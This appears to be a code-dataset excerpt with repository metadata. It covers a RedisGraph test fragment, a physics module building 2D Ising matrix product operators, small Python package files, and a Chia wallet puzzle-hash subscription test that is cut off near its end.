"match (a:person) WHERE outdegree(a) > 0 RETURN a.name, outdegree(a) ORDER BY a.name", # Number of outgoing edges.
"match (a:person) WHERE indegree(a) > 0 RETURN a.name, indegree(a) ORDER BY a.name", # Number of incoming edges.
"match (a:person) WHERE outdegree(a, 'friend') > 0 RETURN a.name, outdegree(a, 'friend') ORDER BY a.name", # Number of typed outgoing edges.
"match (a:person) WHERE indegree(a, 'friend') > 0 RETURN a.name, indegree(a, 'friend') ORDER BY a.name" # Number of typed incoming edges.
]
for i in range(len(aggregations)):
result_agg = redis_graph.query(aggregations[i]).result_set
result_none_agg = redis_graph.query(none_aggregation[i]).result_set
self.env.assertTrue(result_agg == result_none_agg)
def test28_delete_friendships(self):
global redis_graph
q = queries.delete_friendships_query.query
actual_result = redis_graph.query(q)
# assert query run time
self._assert_run_time(actual_result, queries.delete_friendships_query)
def test29_delete_person(self):
global redis_graph
q = queries.delete_person_query.query
actual_result = redis_graph.query(q)
# assert query run time
self._assert_run_time(actual_result, queries.delete_person_query)
def test30_post_delete_label(self):
global redis_graph
q = queries.post_delete_label_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.post_delete_label_query)
# assert query run time
self._assert_run_time(actual_result, queries.post_delete_label_query)
| 36.333333 | 153 | 0.705397 | 2,348 | 18,530 | 5.108177 | 0.076661 | 0.114057 | 0.091879 | 0.056862 | 0.870519 | 0.851676 | 0.798149 | 0.736285 | 0.70727 | 0.656578 | 0 | 0.005583 | 0.236427 | 18,530 | 509 | 154 | 36.404715 | 0.842109 | 0.111495 | 0 | 0.464883 | 0 | 0.026756 | 0.039643 | 0 | 0 | 0 | 0 | 0 | 0.280936 | 1 | 0.110368 | false | 0 | 0.023411 | 0 | 0.137124 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a695bf5d1f8ff799ff65a990c03f07b752cce24 | 26 | py | Python | api/export/__init__.py | imdeepmind/ResearchNote | cfaed6076c028d83035d561456bbb911d43eedbe | [
"MIT"
] | null | null | null | api/export/__init__.py | imdeepmind/ResearchNote | cfaed6076c028d83035d561456bbb911d43eedbe | [
"MIT"
] | null | null | null | api/export/__init__.py | imdeepmind/ResearchNote | cfaed6076c028d83035d561456bbb911d43eedbe | [
"MIT"
] | null | null | null | from .export import Export | 26 | 26 | 0.846154 | 4 | 26 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6a69eedf1ee00c806199f82ff78168bb331415d5 | 6,968 | py | Python | SpinSystems_2d.py | alessandro-santini/Tensor-Network | 3f3c52d61a7ea3d2ceedb03d08f40ad4d153b56e | [
"MIT"
] | null | null | null | SpinSystems_2d.py | alessandro-santini/Tensor-Network | 3f3c52d61a7ea3d2ceedb03d08f40ad4d153b56e | [
"MIT"
] | null | null | null | SpinSystems_2d.py | alessandro-santini/Tensor-Network | 3f3c52d61a7ea3d2ceedb03d08f40ad4d153b56e | [
"MIT"
] | null | null | null | import MPO_class as MPO
import numpy as np
def IsingMPO_2D(Lx, Ly, h=0., J=1):
    """Build the MPO of the 2D transverse-field Ising model
    H = -J * sum_<ij> Sz_i Sz_j - h * sum_i Sx_i
    on an Lx x Ly lattice with row-major site ordering: horizontal bonds
    connect sites at distance 1, vertical bonds at distance Ly.

    Returns an MPO.MPO object with bond dimension Ly + 2.
    """
    n_sites = Lx * Ly
    Ham = MPO.MPO(n_sites, 2)
    # Pauli matrices
    Sx = np.array([[0, 1], [1, 0]])
    Sz = np.array([[1, 0], [0, -1]])
    eye2 = np.eye(2)
    chi = 2 + Ly  # MPO bond dimension: identity channel, Ly carried channels, done channel
    for site in range(1, n_sites - 1):
        W = np.zeros([chi, chi, 2, 2])
        W[0, 0] = eye2
        W[1, 0] = Sz
        # Identity "conveyor" channels carry an emitted Sz operator forward
        # so it can terminate on the neighbour Ly sites away.
        for k in range(1, Ly):
            W[1 + k, k] = eye2
        # Vertical bond (distance Ly): present unless this site is in the last row.
        if site < Ly * (Lx - 1):
            W[-1, -2] = -J * Sz
        else:
            W[-1, -2] = eye2
        # Horizontal bond (distance 1): skipped at the end of each row.
        if (site + 1) % Ly != 0:
            W[-1, 1] = -J * Sz
        W[-1, 0] = -h * Sx
        W[-1, -1] = eye2
        Ham.W[site] = W
    # Boundary tensors: row vector on the left edge, column vector on the right.
    W_left = np.zeros([1, chi, 2, 2])
    W_right = np.zeros([chi, 1, 2, 2])
    W_left[0, 0] = -h * Sx
    W_left[0, 1] = -J * Sz
    W_left[0, -2] = -J * Sz
    W_left[0, -1] = eye2
    W_right[0, 0] = eye2
    W_right[1, 0] = Sz
    W_right[-1, 0] = -h * Sx
    Ham.W[0] = W_left
    Ham.W[-1] = W_right
    return Ham
def IsingMPO_2D_gen_field(Lx, Ly, h=(0.,0.,0.), J=1):
    """Build the MPO of the 2D Ising model with a general magnetic field.

    H = -J * sum_<ij> Sz_i Sz_j - sum_i (h[0] Sx_i + h[1] Sy_i + h[2] Sz_i)
    on an Lx x Ly lattice with row-major site ordering: horizontal bonds
    connect sites at distance 1, vertical bonds at distance Ly.

    Args:
        Lx, Ly: lattice extents; the MPO has Lx*Ly sites.
        h: (hx, hy, hz) field components.
        J: coupling strength of the Sz-Sz bonds.

    Returns:
        MPO.MPO with bond dimension Ly + 2; real-valued when h[1] == 0,
        complex-valued otherwise.
    """
    L = Lx*Ly
    Ham = MPO.MPO(L, 2)
    # Pauli Matrices
    Sx = np.array([[0, 1], [1, 0]])
    Sy = np.array([[0,-1j],[1j,0]])
    Sz = np.array([[1, 0], [0,-1]])
    hS = -h[0]*Sx-h[1]*Sy-h[2]*Sz
    # BUG FIX: hS is always complex (Sy carries 1j) while the W tensors below
    # were previously allocated as real arrays, so numpy discarded the
    # imaginary part on assignment (ComplexWarning) and the Sy term was
    # silently dropped whenever h[1] != 0. Keep hS real when its imaginary
    # part vanishes, and allocate the tensors with a matching dtype otherwise.
    if not np.any(hS.imag):
        hS = hS.real
    dtype = hS.dtype
    for i in range(1, L-1):
        H = np.zeros([2+Ly, 2+Ly, 2, 2], dtype=dtype)
        H[0, 0, :, :] = np.eye(2)
        H[1, 0, :, :] = Sz
        # Identity "conveyor" channels carry Sz to the vertical neighbour.
        for j in range(1, Ly):
            H[1+j,j,:,:] = np.eye(2)
        # Vertical bond (distance Ly): present unless in the last row.
        if i<(Ly*(Lx-1)):
            H[-1,-2,:,:] = -J*Sz
        else:
            H[-1,-2,:,:] = np.eye(2)
        # Horizontal bond (distance 1): skipped at the end of each row.
        if (i+1)%(Ly) != 0:
            H[-1,1,:,:] = -J*Sz
        H[-1,0,:,:] = hS
        H[-1,-1,:,:] = np.eye(2)
        Ham.W[i] = H
    # Boundary tensors: row vector on the left edge, column vector on the right.
    HL = np.zeros([1,2+Ly,2,2], dtype=dtype)
    HR = np.zeros([2+Ly,1,2,2], dtype=dtype)
    HL[0,0, :,:] = hS
    HL[0,1, :,:] = -J*Sz
    HL[0,-2,:,:] = -J*Sz
    HL[0,-1,:,:] = np.eye(2)
    HR[0, 0,:,:] = np.eye(2)
    HR[1, 0,:,:] = Sz
    HR[-1,0,:,:] = hS
    Ham.W[0] = HL
    Ham.W[-1] = HR
    return Ham
def IsingMPO_2D_Spiral_MPS(L, h=0., J=1):
    """Build the 2D transverse-field Ising MPO for an L x L lattice with the
    sites ordered along an inward spiral (instead of row-major order).

    The resulting MPO has site-dependent bond dimensions, computed so that
    each Sz operator is carried just far enough to reach its lattice
    neighbours under the spiral ordering. The ordering matrix is stored on
    the returned object as ``Ham.config``.
    """
    def spiral(rows, columns):
        # Fill a rows x columns matrix with site indices along an inward
        # spiral, counting DOWN from rows*columns-1 starting at the top-left.
        matrix = np.zeros((rows,columns))
        row, column, value = 0, 0, rows*columns-1
        while row < rows and column < columns:
            # Top edge, left -> right.
            for i in range(column, columns):
                matrix[row,i] = value
                value -= 1
            row += 1
            # Right edge, top -> bottom.
            for i in range(row, rows):
                matrix[i,columns - 1] = value
                value -= 1
            columns -= 1
            if row < rows:
                # Bottom edge, right -> left.
                for i in range(columns - 1, column - 1, -1):
                    matrix[rows - 1,i] = value
                    value -= 1
                rows -= 1
            if column < columns:
                # Left edge, bottom -> top.
                for i in range(rows - 1, row - 1, -1):
                    matrix[i,column] = value
                    value -= 1
                column += 1
        return matrix
    def compute_dim_MPO(L):
        # For each site x (in spiral order) collect the 1D distances to its
        # lattice nearest neighbours with a LARGER spiral index (`nearest`),
        # and derive the per-site MPO tensor shapes (`dim`) so the carried
        # channels reach the farthest such neighbour.
        config = spiral(L,L)
        dim = []
        nearest = []
        for x in range(L*L):
            i,j = np.where(config == x)
            i = i[0]; j = j[0]
            nn = []
            # Up/left/down/right lattice neighbours, when they exist.
            if i !=0: nn.append(config[i-1,j])
            if j !=0: nn.append(config[i,j-1])
            if i !=L-1: nn.append(config[i+1,j])
            if j !=L-1: nn.append(config[i,j+1])
            nn = np.array(nn)
            nearest.append( np.array(nn[nn>config[i,j]]-config[i,j],int))
            new_dim = int(np.max(nn-config[i,j]) + 2)
            if x > 0:
                # Left bond dimension must match the previous site's right
                # bond; the right bond may shrink by at most one channel.
                if new_dim < dim[x-1][1]:
                    dim.append((dim[x-1][1],dim[x-1][1]-1,2,2))
                else:
                    dim.append((dim[x-1][1],new_dim,2,2))
            else:
                dim.append((1,new_dim,2,2))
        # The last tensor closes the MPO with a trivial right bond.
        dim[-1] = (dim[-2][1],1,2,2)
        return dim,nearest
    Ham = MPO.MPO(L*L, 2)
    Ham.config = np.array(spiral(L,L),int)
    # Pauli Matrices
    Sx = np.array([[0, 1], [1, 0]])
    Sz = np.array([[1, 0], [0,-1]])
    dimW,nn = compute_dim_MPO(L)
    for i,dim in enumerate(dimW):
        Ham.W[i] = np.zeros(dim)
    # Left Bond
    Ham.W[0][0,0,:,:] = - h*Sx
    for k in nn[0]:
        Ham.W[0][0,k,:,:] = -J*Sz
    Ham.W[0][0,-1,:,:] = np.eye(2)
    # Right Bond
    Ham.W[-1][0,0,:,:] = np.eye(2)
    Ham.W[-1][1,0,:,:] = Sz
    Ham.W[-1][2,0,:,:] = -h*Sx
    # Bulk Bonds
    for i in range(1,L**2-1):
        Ham.W[i][0,0,:,:] = np.eye(2)
        Ham.W[i][-1,0,:,:] = -h*Sx
        Ham.W[i][1,0,:,:] = Sz
        # Emit a -J*Sz bond towards each later nearest neighbour...
        for k in nn[i]:
            Ham.W[i][-1,k,:,:] = -J*Sz
        # ...and shift the carried channels one slot per site.
        for k in range(2,Ham.W[i].shape[0]-1):
            Ham.W[i][k,k-1,:,:] = np.eye(2)
        Ham.W[i][-1,-1,:,:] = np.eye(2)
    return Ham
def IsingMPO_2D_diagonal_MPS(L, h=0., J=1):
    """Build the 2D transverse-field Ising MPO for an L x L lattice with the
    sites ordered along the (anti-)diagonals of the lattice.

    Same construction as IsingMPO_2D_Spiral_MPS, only the site-ordering
    matrix differs; the ordering is stored on the result as ``Ham.config``.
    (FIX: removed stray non-Python text that was fused onto the final
    ``return`` line and broke the file's syntax.)
    """
    def diagonal_matrix(L):
        # Lay out indices 0..L*L-1 diagonal by diagonal, starting from the
        # shortest diagonal (offset L-1) down to offset -(L-1), then flip
        # left-right so the ordering runs along anti-diagonals.
        sites = np.arange(L*L)
        k = 1
        pos = 0
        dist = L-1
        mat = np.zeros((L,L))
        while(dist>-L):
            mat += np.diag(sites[pos:(pos+k)],dist)
            pos += k
            # Diagonal lengths grow until the main diagonal, then shrink.
            if dist > 0:
                k+=1
            else:
                k-= 1
            dist -= 1
        return np.fliplr(mat)
    def compute_dim_MPO(L):
        # For each site x (in diagonal order) collect the 1D distances to its
        # lattice nearest neighbours with a LARGER index, and derive per-site
        # MPO tensor shapes large enough to carry the Sz bonds that far.
        config = diagonal_matrix(L)
        dim = []
        nearest = []
        for x in range(L*L):
            i,j = np.where(config == x)
            i = i[0]; j = j[0]
            nn = []
            # Up/left/down/right lattice neighbours, when they exist.
            if i !=0: nn.append(config[i-1,j])
            if j !=0: nn.append(config[i,j-1])
            if i !=L-1: nn.append(config[i+1,j])
            if j !=L-1: nn.append(config[i,j+1])
            nn = np.array(nn)
            nearest.append( np.array(nn[nn>config[i,j]]-config[i,j],int))
            new_dim = int(np.max(nn-config[i,j]) + 2)
            if x > 0:
                # Left bond matches the previous site's right bond; the
                # right bond may shrink by at most one channel per site.
                if new_dim < dim[x-1][1]:
                    dim.append((dim[x-1][1],dim[x-1][1]-1,2,2))
                else:
                    dim.append((dim[x-1][1],new_dim,2,2))
            else:
                dim.append((1,new_dim,2,2))
        # The last tensor closes the MPO with a trivial right bond.
        dim[-1] = (dim[-2][1],1,2,2)
        return dim,nearest
    Ham = MPO.MPO(L*L, 2)
    Ham.config = np.array(diagonal_matrix(L),int)
    # Pauli Matrices
    Sx = np.array([[0, 1], [1, 0]])
    Sz = np.array([[1, 0], [0,-1]])
    dimW,nn = compute_dim_MPO(L)
    for i,dim in enumerate(dimW):
        Ham.W[i] = np.zeros(dim)
    # Left Bond
    Ham.W[0][0,0,:,:] = - h*Sx
    for k in nn[0]:
        Ham.W[0][0,k,:,:] = -J*Sz
    Ham.W[0][0,-1,:,:] = np.eye(2)
    # Right Bond
    Ham.W[-1][0,0,:,:] = np.eye(2)
    Ham.W[-1][1,0,:,:] = Sz
    Ham.W[-1][2,0,:,:] = -h*Sx
    # Bulk Bonds
    for i in range(1,L**2-1):
        Ham.W[i][0,0,:,:] = np.eye(2)
        Ham.W[i][-1,0,:,:] = -h*Sx
        Ham.W[i][1,0,:,:] = Sz
        # Emit a -J*Sz bond towards each later nearest neighbour...
        for k in nn[i]:
            Ham.W[i][-1,k,:,:] = -J*Sz
        # ...and shift the carried channels one slot per site.
        for k in range(2,Ham.W[i].shape[0]-1):
            Ham.W[i][k,k-1,:,:] = np.eye(2)
        Ham.W[i][-1,-1,:,:] = np.eye(2)
    return Ham
6a73d111c86fbf8b1769423cc303eb6c958c790b | 236 | py | Python | openastro/exceptions.py | Emptyset110/OpenAstro | 22daeda2a76bf231b375e078de6718741c0ca646 | [
"Apache-2.0"
] | null | null | null | openastro/exceptions.py | Emptyset110/OpenAstro | 22daeda2a76bf231b375e078de6718741c0ca646 | [
"Apache-2.0"
] | null | null | null | openastro/exceptions.py | Emptyset110/OpenAstro | 22daeda2a76bf231b375e078de6718741c0ca646 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
class WrongFilePath(BaseException):
    """Raised when a referenced file path does not exist.

    NOTE(review): this subclasses BaseException rather than Exception, so a
    plain ``except Exception`` will NOT catch it — confirm that is intended
    before changing the base class.

    (FIX: removed stray non-Python text that was fused onto the final
    ``return`` line and broke the file's syntax.)
    """

    def __init__(self, wrong_file_path=""):
        # Keep the offending path so callers can inspect it programmatically.
        self.wrong_file_path = wrong_file_path

    def __str__(self):
        return "File {} does not exist.".format(self.wrong_file_path)
6a84b61bd459ba50c2a99865c9b9524099621eb6 | 38 | py | Python | simpleemailbot/__init__.py | cdmacfadyen/emailbot | 1bc8769179e5722e4a7634f6d5f7dd8521af155f | [
"MIT"
] | null | null | null | simpleemailbot/__init__.py | cdmacfadyen/emailbot | 1bc8769179e5722e4a7634f6d5f7dd8521af155f | [
"MIT"
] | 2 | 2020-10-23T11:32:34.000Z | 2020-10-23T11:33:22.000Z | simpleemailbot/__init__.py | cdmacfadyen/emailbot | 1bc8769179e5722e4a7634f6d5f7dd8521af155f | [
"MIT"
] | null | null | null | from .simpleemailbot import EmailBot
| 12.666667 | 36 | 0.842105 | 4 | 38 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131579 | 38 | 2 | 37 | 19 | 0.969697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6aa21ae16fdfb019f9b457feefddd378af1de6a2 | 43 | py | Python | wikireader/wiki/__init__.py | mke21/wikireader | 767422a736498d5147650cae52a89da7d0c43b65 | [
"MIT"
] | null | null | null | wikireader/wiki/__init__.py | mke21/wikireader | 767422a736498d5147650cae52a89da7d0c43b65 | [
"MIT"
] | 7 | 2020-11-12T20:16:14.000Z | 2020-11-18T20:33:16.000Z | wikireader/wiki/__init__.py | mke21/wikireader | 767422a736498d5147650cae52a89da7d0c43b65 | [
"MIT"
] | null | null | null | from .mine_wiki import search, get_article
| 21.5 | 42 | 0.837209 | 7 | 43 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 43 | 1 | 43 | 43 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6aa4872a4c3b5f39ddcd2087db0187ce1f2cb107 | 84 | py | Python | app/models/__init__.py | BlueJillYang/blog | 16caf25af310b22e5c54f690e0b8cde9aff48cef | [
"Apache-2.0"
] | null | null | null | app/models/__init__.py | BlueJillYang/blog | 16caf25af310b22e5c54f690e0b8cde9aff48cef | [
"Apache-2.0"
] | null | null | null | app/models/__init__.py | BlueJillYang/blog | 16caf25af310b22e5c54f690e0b8cde9aff48cef | [
"Apache-2.0"
] | null | null | null | from .user import *
from .upload import *
db.generate_mapping(create_tables=True)
| 14 | 39 | 0.77381 | 12 | 84 | 5.25 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130952 | 84 | 5 | 40 | 16.8 | 0.863014 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0ab1b2de6f18588880c64247b448d4467d29b560 | 30,625 | py | Python | tests/wallet/simple_sync/test_simple_sync_protocol.py | ojura/chia-blockchain | 6a754c0b84a4cd73960895964413583071d65c28 | [
"Apache-2.0"
] | null | null | null | tests/wallet/simple_sync/test_simple_sync_protocol.py | ojura/chia-blockchain | 6a754c0b84a4cd73960895964413583071d65c28 | [
"Apache-2.0"
] | null | null | null | tests/wallet/simple_sync/test_simple_sync_protocol.py | ojura/chia-blockchain | 6a754c0b84a4cd73960895964413583071d65c28 | [
"Apache-2.0"
] | 1 | 2022-03-15T05:17:02.000Z | 2022-03-15T05:17:02.000Z | # flake8: noqa: F811, F401
import asyncio
from typing import List, Optional
import pytest
import pytest_asyncio
from clvm.casts import int_to_bytes
from colorlog import getLogger
from chia.consensus.block_rewards import calculate_pool_reward, calculate_base_farmer_reward
from chia.protocols import wallet_protocol, full_node_protocol
from chia.protocols.full_node_protocol import RespondTransaction
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.protocols.wallet_protocol import RespondToCoinUpdates, CoinStateUpdate, RespondToPhUpdates, CoinState
from chia.server.outbound_message import NodeType
from chia.simulator.simulator_protocol import FarmNewBlockProtocol, ReorgProtocol
from chia.types.blockchain_format.coin import Coin
from chia.types.coin_record import CoinRecord
from chia.types.condition_opcodes import ConditionOpcode
from chia.types.condition_with_args import ConditionWithArgs
from chia.types.peer_info import PeerInfo
from chia.types.spend_bundle import SpendBundle
from chia.util.ints import uint16, uint32, uint64
from chia.wallet.wallet import Wallet
from chia.wallet.wallet_state_manager import WalletStateManager
from tests.connection_utils import add_dummy_connection
from tests.pools.test_pool_rpc import wallet_is_synced
from tests.setup_nodes import setup_simulators_and_wallets
from tests.time_out_assert import time_out_assert
from tests.wallet.cat_wallet.test_cat_wallet import tx_in_pool
from tests.wallet_tools import WalletTool
def wallet_height_at_least(wallet_node, h):
    # True when the wallet's cached blockchain peak equals h.
    # NOTE(review): despite the "at_least" name this is an equality check,
    # not >= — confirm callers rely on the exact-match behaviour before changing.
    peak_height = wallet_node.wallet_state_manager.blockchain._peak_height
    return peak_height == h
log = getLogger(__name__)
@pytest.fixture(scope="session")
def event_loop():
    """Provide one session-wide asyncio event loop for all async tests."""
    yield asyncio.get_event_loop()
class TestSimpleSyncProtocol:
@pytest_asyncio.fixture(scope="function")
async def wallet_node_simulator(self):
async for _ in setup_simulators_and_wallets(1, 1, {}):
yield _
@pytest_asyncio.fixture(scope="function")
async def wallet_two_node_simulator(self):
async for _ in setup_simulators_and_wallets(2, 1, {}):
yield _
async def get_all_messages_in_queue(self, queue):
all_messages = []
await asyncio.sleep(2)
while not queue.empty():
message, peer = await queue.get()
all_messages.append(message)
return all_messages
    @pytest.mark.asyncio
    async def test_subscribe_for_ph(self, wallet_node_simulator, self_hostname):
        """End-to-end check of puzzle-hash subscriptions (RegisterForPhUpdates):
        an empty subscription returns no states, farming to a subscribed
        puzzle hash produces CoinStateUpdate pushes (2 coins per farmed
        height: farmer + pool reward), additional subscriptions can be added
        later, and spending a subscribed coin produces a spent notification.
        """
        num_blocks = 4
        full_nodes, wallets = wallet_node_simulator
        full_node_api = full_nodes[0]
        wallet_node, server_2 = wallets[0]
        fn_server = full_node_api.full_node.server
        wsm: WalletStateManager = wallet_node.wallet_state_manager
        await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
        # A dummy connection lets us inspect the raw pushed protocol messages.
        incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
        zero_ph = 32 * b"\0"
        junk_ph = 32 * b"\a"
        fake_wallet_peer = fn_server.all_connections[peer_id]
        # Subscribing before any coins exist must return an empty state list.
        # NOTE(review): RespondToPhUpdates is parsed via RespondToCoinUpdates.from_bytes
        # here — presumably the wire formats are compatible; confirm.
        msg = wallet_protocol.RegisterForPhUpdates([zero_ph], 0)
        msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
        assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
        data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
        assert data_response.coin_states == []
        # Farm few more with reward
        for i in range(0, num_blocks):
            if i == num_blocks - 1:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
            else:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
        # Re-subscribing now returns the reward coins created above.
        msg = wallet_protocol.RegisterForPhUpdates([zero_ph], 0)
        msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
        assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
        data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
        assert len(data_response.coin_states) == 2 * num_blocks  # 2 per height farmer / pool reward
        # Farm more rewards to check the incoming queue for the updates
        for i in range(0, num_blocks):
            if i == num_blocks - 1:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
            else:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
        all_messages = await self.get_all_messages_in_queue(incoming_queue)
        # Every coin the node knows for zero_ph must have been pushed to us.
        zero_coin = await full_node_api.full_node.coin_store.get_coin_states_by_puzzle_hashes(True, [zero_ph])
        all_zero_coin = set(zero_coin)
        notified_zero_coins = set()
        for message in all_messages:
            if message.type == ProtocolMessageTypes.coin_state_update.value:
                data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
                for coin_state in data_response.items:
                    notified_zero_coins.add(coin_state)
                assert len(data_response.items) == 2  # 2 per height farmer / pool reward
        assert all_zero_coin == notified_zero_coins
        # Test subscribing to more coins
        one_ph = 32 * b"\1"
        msg = wallet_protocol.RegisterForPhUpdates([one_ph], 0)
        msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
        peak = full_node_api.full_node.blockchain.get_peak()
        for i in range(0, num_blocks):
            if i == num_blocks - 1:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
            else:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
        for i in range(0, num_blocks):
            if i == num_blocks - 1:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(one_ph))
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
            else:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(one_ph))
        # Only zero_ph coins created after the recorded peak should be pushed
        # (the earlier ones were already delivered above).
        zero_coins = await full_node_api.full_node.coin_store.get_coin_states_by_puzzle_hashes(
            True, [zero_ph], peak.height + 1
        )
        one_coins = await full_node_api.full_node.coin_store.get_coin_states_by_puzzle_hashes(True, [one_ph])
        all_coins = set(zero_coins)
        all_coins.update(one_coins)
        all_messages = await self.get_all_messages_in_queue(incoming_queue)
        notified_all_coins = set()
        for message in all_messages:
            if message.type == ProtocolMessageTypes.coin_state_update.value:
                data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
                for coin_state in data_response.items:
                    notified_all_coins.add(coin_state)
                assert len(data_response.items) == 2  # 2 per height farmer / pool reward
        assert all_coins == notified_all_coins
        # Now exercise a real wallet puzzle hash: farm to it, then spend from it.
        wsm: WalletStateManager = wallet_node.wallet_state_manager
        wallet: Wallet = wsm.wallets[1]
        puzzle_hash = await wallet.get_new_puzzlehash()
        for i in range(0, num_blocks):
            if i == num_blocks - 1:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
            else:
                await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
        # Expected balance: farmer + pool reward for each farmed height.
        funds = sum(
            [
                calculate_pool_reward(uint32(i)) + calculate_base_farmer_reward(uint32(i))
                for i in range(1, num_blocks + 1)
            ]
        )
        fn_amount = sum(
            cr.coin.amount
            for cr in await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(False, puzzle_hash)
        )
        await time_out_assert(15, wallet.get_confirmed_balance, funds)
        assert funds == fn_amount
        msg_1 = wallet_protocol.RegisterForPhUpdates([puzzle_hash], 0)
        msg_response_1 = await full_node_api.register_interest_in_puzzle_hash(msg_1, fake_wallet_peer)
        assert msg_response_1.type == ProtocolMessageTypes.respond_to_ph_update.value
        data_response_1: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response_1.data)
        assert len(data_response_1.coin_states) == 2 * num_blocks  # 2 per height farmer / pool reward
        await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
        # Spend one subscribed coin; we should later see its spent notification.
        tx_record = await wallet.generate_signed_transaction(uint64(10), puzzle_hash, uint64(0))
        assert len(tx_record.spend_bundle.removals()) == 1
        spent_coin = tx_record.spend_bundle.removals()[0]
        assert spent_coin.puzzle_hash == puzzle_hash
        await wallet.push_transaction(tx_record)
        await time_out_assert(
            15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
        )
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
        # Let's make sure the wallet can handle a non ephemeral launcher
        from chia.wallet.puzzles.singleton_top_layer import SINGLETON_LAUNCHER_HASH
        await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
        tx_record = await wallet.generate_signed_transaction(uint64(10), SINGLETON_LAUNCHER_HASH, uint64(0))
        await wallet.push_transaction(tx_record)
        await time_out_assert(
            15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
        )
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(SINGLETON_LAUNCHER_HASH))
        await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
        # Send a transaction to make sure the wallet is still running
